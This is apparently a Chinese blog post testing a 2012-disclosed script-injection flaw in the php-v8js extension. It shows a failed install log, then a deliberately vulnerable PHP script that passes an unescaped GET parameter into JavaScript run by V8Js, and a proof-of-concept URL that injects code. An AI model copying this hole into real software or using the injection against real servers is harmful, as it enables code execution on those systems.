http://seclists.org/fulldisclosure/2012/Feb/409
测试一下,安装php-v8js需要php在5.33及以上版本。
root@ubuntu:/home/heige/exp# pecl install v8js
Failed to download pecl/v8js within preferred state "stable", latest release is version 0.1.2, stability "beta", use "channel://pecl.php.net/v8js-0.1.2" to install
install failed
root@ubuntu:/home/heige/exp# pecl install channel://pecl.php.net/v8js-0.1.2
WARNING: channel "pecl.php.net" has updated its protocols, use "pecl channel-update pecl.php.net" to update
downloading v8js-0.1.2.tgz ...
Starting to download v8js-0.1.2.tgz (17,745 bytes)
......done: 17,745 bytes
8 source files, building
running: phpize
Configuring for:
PHP Api Version: 20090626
Zend Module Api No: 20090626
Zend Extension Api No: 220090626
Please provide the installation prefix of libv8 [autodetect] :
building in /tmp/pear/temp/pear-build-rootHrXXj4/v8js-0.1.2
running: /tmp/pear/temp/v8js/configure --with-v8js
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for a sed that does not truncate output... /bin/sed
checking for cc... cc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether cc accepts -g... yes
checking for cc option to accept ISO C89... none needed
checking how to run the C preprocessor... cc -E
checking for icc... no
checking for suncc... no
checking whether cc understands -c and -o together... yes
checking for system library directory... lib
checking if compiler supports -R... no
checking if compiler supports -Wl,-rpath,... yes
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking target system type... i686-pc-linux-gnu
checking for PHP prefix... /usr
checking for PHP includes... -I/usr/include/php5 -I/usr/include/php5/main -I/usr/include/php5/TSRM -I/usr/include/php5/Zend -I/usr/include/php5/ext -I/usr/include/php5/ext/date/lib -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
checking for PHP extension directory... /usr/lib/php5/20090626+lfs
checking for PHP installed headers prefix... /usr/include/php5
checking if debug is enabled... no
checking if zts is enabled... no
checking for re2c... no
configure: WARNING: You will need re2c 0.13.4 or later if you want to regenerate PHP parsers.
checking for gawk... no
checking for nawk... nawk
checking if nawk is broken... no
checking for V8 Javascript Engine... yes, shared
checking for V8 files in default path... not found
configure: error: Please reinstall the v8 distribution
ERROR: `/tmp/pear/temp/v8js/configure --with-v8js' failed
用上面的方式安装会失败,经过Ryat牛的指点,直接下deb安装:https://launchpad.net/~ivan1986/+archive/ppa/+build/2627836
然后修改一下php.ini 调用 就ok了:
extension=v8js.so
测试代码:
<?php
$msg = $_GET['msg'];
$v8 = new V8Js();
$JS = <<< EOT
var msg='$msg';
print(msg);
EOT;
try {
var_dump($v8->executeString($JS, 'basic.js'));
} catch (V8JsException $e) {
var_dump($e);
}
?>
http://localhost/v8jsvul.php?msg=11%27;print%28new%20Date%28%29%29;var%20a=%27
得到
Sun Feb 26 2012 21:37:31 GMT-0800 (PST)11int(2)
至于还可以做点啥子,我就不 太清楚了,望看官们指点~~~~~~
